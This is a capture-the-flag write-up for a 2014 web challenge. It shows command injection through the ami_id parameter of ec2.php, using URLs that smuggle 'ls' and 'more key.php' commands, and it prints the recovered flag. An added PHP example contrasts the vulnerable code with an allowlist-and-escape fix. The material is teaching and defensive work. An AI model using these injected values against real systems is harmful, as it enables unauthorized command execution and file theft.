This weekend we had 46 hours of hard CTF. The organizers let you play a ‘doom-style’ game that could be decompiled and had to be pwned to complete some missions.
This task is one of two web challenges, a parody of CTF365 (lol). Going to ctf247.2014.ghostintheshellcode.com, it was pretty simple, since we noticed there was a command injection in one of the parameters (ami_id):
/ec2.php?utf8=✓&ami_id=ami-4be3d522&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server
First we are going to see what files are available:
/ec2.php?utf8=✓&ami_id=1;ls *&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server
16K -rw-r--r-- 1 0 16K Jan 19 16:24 index.html
4.0K -rw-r--r-- 1 0 86 Jan 19 15:27 key.php
4.0K -rw-r--r-- 1 0 2.5K Jan 18 21:16 ec2.php
ec2-api-tools-1.6.12.0:
total 104K
4.0K drwxr-xr-x 3 0 4.0K Jan 19 13:44 .
36K drwxr-xr-x 2 0 36K Jan 19 13:44 bin
4.0K drwxr-xr-x 4 0 4.0K Jan 18 21:17 ..
48K -rw-r--r-- 1 0 46K Jan 18 21:16 THIRDPARTYLICENSE.TXT
8.0K -rw-r--r-- 1 0 4.8K Jan 18 21:16 license.txt
4.0K -rw-r--r-- 1 0 539 Jan 18 21:16 notice.txt
... ... ...
So key.php has the flag; let’s dump it. I placed ami_id=2;cat%20key.php, but nothing happened (even when viewing the source code), so let’s use ‘more’:
/ec2.php?utf8=✓&ami_id=1;more%20key.php&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server
Finally we get the flag, which was hidden as a comment:
flag: 0aea26e968895efa40b563e3e8fe8f19
Done :)
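The bug class behind this challenge, seen from the defender's side, as an added example that is not the challenge's ec2.php source (the write-up does not show it). The function names, the use of ec2-run-instances as the invoked tool, and the 8-hex-digit AMI id pattern are assumptions for illustration.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical handler, not the real ec2.php.

// Allowlist for the AMI id format seen in the original request (ami- + 8 hex digits).
const AMI_ID_PATTERN = '/\Aami-[0-9a-f]{8}\z/';

// Vulnerable pattern: the parameter is concatenated into a shell command line,
// so the shell treats ';' as a command separator and runs whatever follows it.
function build_command_vulnerable(string $amiId): string
{
    return 'ec2-run-instances ' . $amiId;
}

// Hardened pattern: reject anything that is not an AMI id, then quote it anyway
// so a future change to the pattern cannot reintroduce the injection.
function build_command_hardened(string $amiId): ?string
{
    if (preg_match(AMI_ID_PATTERN, $amiId) !== 1) {
        return null; // caller should answer with HTTP 400 and log the value
    }
    return 'ec2-run-instances ' . escapeshellarg($amiId);
}

// Constructed inputs: the legitimate value and the two ami_id values from the write-up.
$samples = ['ami-4be3d522', '1;ls *', '1;more key.php'];

foreach ($samples as $value) {
    $hardened = build_command_hardened($value);
    printf(
        "%-16s vulnerable: %-34s hardened: %s\n",
        $value,
        build_command_vulnerable($value),
        $hardened ?? 'rejected'
    );
}
```

The commands are only built and printed, never executed, so the script can be run with the PHP CLI without the EC2 tools installed.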